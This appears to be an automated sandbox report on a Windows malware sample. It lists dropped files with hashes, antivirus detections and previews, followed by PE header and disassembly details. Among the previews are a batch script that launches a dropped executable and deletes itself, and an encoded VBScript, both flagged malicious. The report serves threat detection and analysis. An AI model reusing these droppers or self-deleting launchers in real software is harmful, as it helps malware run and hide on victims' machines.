                Preview:ezFLxNmM48GGwHyE3vbeGFhIVoStyT8JXcPZ2Oa3wHJRd2B5f2XxJ3TYS70J52Yl96sU1ZMoVhs96QpcnXO65LAeI1H4YR83thRgJrDFptclKTcBSXghobqy6NLASSPDjzQY9IT6TIRMsYUyYFmBvaOR1dj5fDxXdYCUDDCJEkOgKeFi3WlMpOSJl8hgjXaQV3sUW9vVDc6LLsHWXBCIbkrOG2tEfgkrJ8KQvvL3lQJNSH721KIiVSyuMeNdQqzg2PBNh0lmzIhLbd6850NUXCW1JaERhsn4amVDFtVAjgsMunTsiPiZdfJz3KEHwUEGfnvyI23MfMv1TJGgGVsSKNa5dfK5pNOObmqH1ekpVW4RtRgtEhAblw6SMzVms8gR7gZrc8oluD6ySJLL9a0HMxnopY5BJ76XznTN2zQG2Zqi
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):220
                Entropy (8bit):5.704980326689536
                Encrypted:false
                SSDEEP:6:KaQfi15G/igV/HqEp1WNRUxY1C24EYePwEJA0WCzB:KaxyagVSELLxe4EcEJA0Wc
                MD5:683EB3E9075ACB5AC0567447C8290E84
                SHA1:B7FF66F6AA1962900FBBF76AF89F7343A56BAB05
                SHA-256:A2FE7FDA403418CEDEF1B747988D7B57B9104EDB96C9BD35AB57533AF861367F
                SHA-512:B3B889ED3B6A7FEB20729AFB87E2CF3B7B8D9DE6109D36FFF8783F5BCDBAFFDF6835184AA15C1C649F7FCE2D357EAF6E63FF6DB92E5209692F83E422F1938B8D
                Malicious:false
                Preview:vHthavB0kAxejZuzLYYda9WPmL4z6n0LpmfHSDhkOUwh6y52SJDgZZwvue5P0L47Kmy64mhH1xPFMzSxPChwjTwP0tXxHSuCazWTA97pm5plKrj5LI9yoHX00iGKPtAjDMpWc9wQE1JooKFIKbm9S5YScfdc2xZ35Fi7BMdMVtuw7tMpd79yHARIyW46fTXQbQsimHG88ZojLlUtTx94ylw5yaJp
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):70
                Entropy (8bit):5.404213195485488
                Encrypted:false
                SSDEEP:3:RCmNqbm03RY/XkDRluVae9MR2:ImkC03RYfKSZQ2
                MD5:AF403E4819542F5BD33FA084DDE14AD2
                SHA1:D2F1131547E79EFC7AE323C24E7AE392782598A6
                SHA-256:BEED537E0C98BD11C6B462F321D83829C1A7083BF5CAA7692E2BBDD7B40926DF
                SHA-512:C378EDC0265A70AC17BE93A33FA0F8E556C2F4BD06C69FC14B732D5D18B26AFACA7FB222264F04E12990D2BC3EBB03CC027534F83ABEF4697038B59F291AA1C5
                Malicious:false
                Preview:hLpZQvCETK81VgW59C2ARimzIBscH74xdxwDZr92vWutmX495qM262w9j0ROCk7VPLXitS
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with very long lines (327), with no line terminators
                Category:dropped
                Size (bytes):327
                Entropy (8bit):5.833046311575464
                Encrypted:false
                SSDEEP:6:o8ilvt3qvIgvVZ+bYjll/Hau+u7g9yWUEeY+38NDrmuOoz9FlLQEC1:niJtavBkGly8RWUEfDnO2LQJ
                MD5:C105CD501B5D1E3556F087D12C403A0F
                SHA1:564A3DEFBA8A654482763E9DF8101A0412D66F09
                SHA-256:2CFA1EA1FE8CA024E057652E7186D9B4FC06A03B87C532C27D7C71F783A730C2
                SHA-512:BC7906C7E897C088793CEBB10DF547AB97EA1D1FA893ECBB3233EB1226048BF17B8A461CD601EB3689FAE75E1F41A1E94B12E4EC8C9584E933043BA15267BC4C
                Malicious:false
                Preview:haJrUwCNzYSZdb3trIScxuVOv5RrNvHvZg4vloYsbJEMcN3Te7mcfAgwE46ZfU9DRg97gIIDtkBoqIvhB8NQJoPZ9Iqqs8MGJA55N6xWzis582G6JYYhHt4mRk7YbbVvX5eqM0UEK0bk6UaHBuhUjp8aFTon8Y4XN7iDXatSDTWQSUq7KzWq4BLr6Ek3MrGv5DW8vWulBOQQTsHunqdJCOcMw0HTz0GWNkUO8rLxFuppu4YO6zPfN6trkJL5OavKI3CtX2w5fpDSixb1c3XAkkIQ1nnyfQip8eh12o1DDTAi3aJxsUcVCvkiuv2tP8aOGYTDPk9
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with very long lines (435), with no line terminators
                Category:dropped
                Size (bytes):435
                Entropy (8bit):5.84816705924136
                Encrypted:false
                SSDEEP:12:7YS6h0JRH5vZcM8Whg3L+avuVBkXSSGIqoSxhnn:KubtiMl4L+53kXKIqoSxhn
                MD5:1FC6EDF94E7B7E8B9EC3ECEABFF6C643
                SHA1:40E24A1D7E6CD1B5C05CE135B609081634ED232E
                SHA-256:5261EBE8BD4EDD4C4CC947567AD0CBA051F0F4DF4F37BC79D49F75896D3B2753
                SHA-512:83A1BB9F2561AD89E6CB7C12FB05D6AF23AAD745B6A475B886386097BCA7C3441CE0F56A0D6DA29972D06C98D4D1B7956D9E8142824A7AB51BBA630EDFAFA323
                Malicious:false
                Preview:jo5as3qz3vHSx1ED8oSuf7PfM4Xr0Syr2v4eV2PlsIrHc6M6KQulXS4lZZOxg99l6aZB7jrGYrBXPHDPsbgkiNTk0SF6nbFtJGKCgK9lioMpQhWRW8FEdZCtGzLoevc7mSOJ6Athc5B3AoTT6xjoWAQuDb5r9UGxMPD8TMVVPhmhXJtcf2rqLxkmCeFfFCiHyNrukVAtcNZzXsW4rdLHmZlYob5yHzQN8ftJb81K28O8YvOUHLxl1beYmSFJZLmm7L029McsmAPoLnA3Mlr5BpWhAUhI2ruqVlBM4WU4sF80MzN8RM7ydqkRyT1ppUz5PiSjmy8zQwN6qgUKGi0qt6NpBtXlfpPYPDlohnWdOHhrdolS8qiGdJLSVni2aWUkgyrm4qncLXblZfLXHFnzHI5F2ST3FeD1x6Lo68XSCF5Frj3zcLu
                Process:C:\Program Files\Windows Portable Devices\Idle.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1281
                Entropy (8bit):5.370111951859942
                Encrypted:false
                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                MD5:12C61586CD59AA6F2A21DF30501F71BD
                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                Process:C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1281
                Entropy (8bit):5.370111951859942
                Encrypted:false
                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                MD5:12C61586CD59AA6F2A21DF30501F71BD
                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1915
                Entropy (8bit):5.363869398054153
                Encrypted:false
                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1Jtpaq2
                MD5:E6E3A2B5063C33228E2749DC291A1D3D
                SHA1:F3F32E2F204DE9AFA50D5DE1C132A8039C5A315C
                SHA-256:2F6BA7ECDDEF02B291DEA6E03ADD8A30A67B8DE1B7E256FA99B14A28AB9BE831
                SHA-512:15EF30345C2F08AD858A9E5C10CD309F00D1951E4A4902CE8F8700A2B0A25FCFADCFCDA6D13EC7B215B0AF1AB24C8956033E93A403178ED7A98138476D4F9967
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:DOS batch file, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):215
                Entropy (8bit):5.074671579826758
                Encrypted:false
                SSDEEP:6:hITg3Nou11r+DEimKQkSXLsKOZG1wkn23fVHK:OTg9YDEi9TfY
                MD5:E53D7B277DD85C6063B0C2E240C4BC56
                SHA1:95BD65FF4BB0479A9D66F68C7C785EEB1AA66538
                SHA-256:7C99E911C9224EFFAAEFC2B5A58DE638980C92F9BEA13C1923CC4C5CC039FB5F
                SHA-512:518C41C0DEF13B0E86C99E3F6142B20E1FE441859E0A7C15A5EB2D8FD525703ED8B3F674073D52C32FE654C81B08311434104EE0B81BB5F665B4B43524E4DD89
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Program Files\Windows Portable Devices\upfc.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\GoElC7XtGN.bat"
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):25
                Entropy (8bit):4.323856189774723
                Encrypted:false
                SSDEEP:3:D9sgyFF/jbUXn:hsgyvsX
                MD5:D276564574B4133CDBA1CE0AC2003CBD
                SHA1:B3087FC8099CB7F1E622CEE3762F654F741CB462
                SHA-256:4DAA1D46855D3F4216F914D504B7E8A727D7A6F89466281C6F8662096C86B2B0
                SHA-512:F4839AEB0D6A29E720019987DECC78111C08379AAB51323D5F692E29ABE060C7C7ED47D360679B8D9735211A62E88E84476D6172AAA2B4F866EC47188E578771
                Malicious:false
                Preview:EcXtx0F3hWWXBwysOZ7uKqqQK
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):64
                Entropy (8bit):5.09727441389348
                Encrypted:false
                SSDEEP:3:G6XT68bVrX0lLktISQQQT:G8D5rXCgXQQG
                MD5:2D99F012A1F8AF7A01580BEFB490ADE4
                SHA1:C3795496B93BE5E82FF874E6C363F9217A39A87A
                SHA-256:62DB5C28968163AE12928942DAD195145208DB959DB72C981F2F743D54558865
                SHA-512:208C80DF893B0B03987C49DCC9FADD0D2CA2304DB20E4AB7BD05B6480282DE12BD32BDECD78DB9D270528A0F334B8FF6C8F2CFBD5EFD197F567910681E94B0C2
                Malicious:false
                Preview:W0BzrWr6NCLnrUdczextM7bqbrmNrQntounDwwEiGd5mG3Ar2BeNM41YYVXAueP6
                Process:C:\Users\user\Desktop\rWjaZEKha8.exe
                File Type:data
                Category:dropped
                Size (bytes):225
                Entropy (8bit):5.864818538536192
                Encrypted:false
                SSDEEP:6:GV0wqK+NkLzWbH9WF08nZNDd3RL1wQJRcUbkqRvm56UnEgX:GVFMCzWL74d3XBJ2KkqM6UJX
                MD5:766D272299241FC13968CB8B7C426A33
                SHA1:D74D13748E4AD4525438156682C97EE88038D377
                SHA-256:72EEFED0912DCF4952A9F4FD92172D21872EAA148D5C9D08A0BFBB7918038BDF
                SHA-512:DFADCBB1E2E9FDDE6A6E2E1542ECE82212D34AE9F2EAC7DFE5C674C030231F26EE10AC93E8B271B11D7031A40FD79425B21C14B2494EA930A7DFDBB5C88671AB
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Preview:#@~^yAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v*T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ4.bNT+tHw..w.DWN4m2&ghI:ikb.vG+e/ZKM:.0)P12uck+*MR8CDJ~~TBPWl^d.4T8AAA==^#~@.
                Process:C:\Users\user\Desktop\rWjaZEKha8.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):37
                Entropy (8bit):4.152171866202903
                Encrypted:false
                SSDEEP:3:I53ADNkvnLbh4AH:IiDNCN4i
                MD5:64D274AC760869D543A1B42C291BC6C0
                SHA1:01ACA26ECF2DDE8404E8D0CB2D98C83E1B2F7F8E
                SHA-256:8FDAF6BF336955476FD4FE2CE9AF835BB29046A5012D6B2DD0FD8744FA9B76C9
                SHA-512:A355E7B08F4C9F77DC62CE876BDD2D5B71B44720B52B9DB8E5A80F07635256F5A1FFE5E940AA04F01DB67BA81C8D5751E36D8E769EC83EBF6EE4CAD149FB5E85
                Malicious:false
                Preview:"C:\bridgehyperperfdhcp\intoDhcp.exe"
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\bridgehyperperfdhcp\intoDhcp.exe
                File Type:ASCII text, with very long lines (626), with no line terminators
                Category:dropped
                Size (bytes):626
                Entropy (8bit):5.873547683880803
                Encrypted:false
                SSDEEP:12:6uUkWpsz5T6QSUmLgW5sFw2rGcoELKA/ySdT1fyFRMKor5n:6uUkWpu2HUmL7sFw2qcQA6SdhfCWKWn
                MD5:F9BF83716C815D9C2AFCAD649CBD90BF
                SHA1:3C58EE2F9C03C6BF64C3636DC52031F936F27E5D
                SHA-256:4A394AFEF6D4246385E3634D944698CFC038AD93BB6B2D1857A439FE52D8D5B6
                SHA-512:8F448EDFCF2F1E30757B9E19DC2129AE1CF78CE1BB2302CF78419DCF25BB9BCD985388C9FE01875776FBA6AD7E2C0192676595F018FF42AB5532A4A52A96573B
                Malicious:false
                Preview:
                Process:C:\Users\user\Desktop\rWjaZEKha8.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1344000
                Entropy (8bit):7.058639105961635
                Encrypted:false
                SSDEEP:24576:wSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8L:toKmNxYwbkyoK6KqTu8
                MD5:889D38A4230664BEFDBB3D1528E08DF2
                SHA1:A1BFE5EFCC301E2D5C66847CD730426BB641761E
                SHA-256:21D8F3CF705420CBD00EE7466F3F7EAAA98323F111750ABEF9B4C88CEEB6218C
                SHA-512:2DFE0A543E90E6D41A589B1DB392F3FD384F35EE255BC6AA2A6BB3C58CB4B9763D05D2CEBCCEFF83A891C4C7B4B3D2DC4821F0EE4219CE576460DD1A93D73254
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 76%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................H...6......>f... ........@.. ....................................@..................................e..K.................................................................................... ............... ..H............text...DF... ...H.................. ..`.sdata.../.......0...L..............@....rsrc................|..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.054878011974157
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                • Win32 Executable (generic) a (10002005/4) 49.97%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:rWjaZEKha8.exe
                File size:1'661'068 bytes
                MD5:5d579285e5efdf6de25da8d83d7aa9be
                SHA1:09c112d891262a4967f5fd7e864b4cc040297858
                SHA256:c03fa0ee0fe28bde170f78b55cfa13a61dde423d9f66e3fbd8bb53dd3c0c1fb4
                SHA512:7f442f1a255f56208c72183913709cbf40fdc07612bccedb847564322d265cb6a6d37f168cb2d91ae12edff5cf675e298408cdeb8897b17c49d8fbfa2aae5dd6
                SSDEEP:24576:U2G/nvxW3Ww0tBSohNy3mNDK0ydmlrx5YjqPqykyxovSzWKopkOu8LU:UbA30coKmNxYwbkyoK6KqTu8Q
                TLSH:DD758C017E44CE11F0191633C2EF45448BB4AC112AA6E72B7EBA376D59123937D1EAEF
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
                Icon Hash:1515d4d4442f2d2d
                Entrypoint:0x41ec40
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
                Instruction
                call 00007F0358E3CC49h
                jmp 00007F0358E3C65Dh
                cmp ecx, dword ptr [0043E668h]
                jne 00007F0358E3C7D5h
                ret
                jmp 00007F0358E3CDCEh
                int3
                int3
                int3
                int3
                int3
                push ebp
                mov ebp, esp
                push esi
                push dword ptr [ebp+08h]
                mov esi, ecx
                call 00007F0358E2F567h
                mov dword ptr [esi], 00435580h
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                and dword ptr [ecx+04h], 00000000h
                mov eax, ecx
                and dword ptr [ecx+08h], 00000000h
                mov dword ptr [ecx+04h], 00435588h
                mov dword ptr [ecx], 00435580h
                ret
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                lea eax, dword ptr [ecx+04h]
                mov dword ptr [ecx], 00435568h
                push eax
                call 00007F0358E3F96Dh
                pop ecx
                ret
                push ebp
                mov ebp, esp
                sub esp, 0Ch
                lea ecx, dword ptr [ebp-0Ch]
                call 00007F0358E2F4FEh
                push 0043B704h
                lea eax, dword ptr [ebp-0Ch]
                push eax
                call 00007F0358E3F082h
                int3
                push ebp
                mov ebp, esp
                sub esp, 0Ch
                lea ecx, dword ptr [ebp-0Ch]
                call 00007F0358E3C774h
                push 0043B91Ch
                lea eax, dword ptr [ebp-0Ch]
                push eax
                call 00007F0358E3F065h
                int3
                jmp 00007F0358E410B3h
                jmp dword ptr [00433260h]
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                int3
                push 00421EB0h
                push dword ptr fs:[00000000h]
                Programming Language:
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
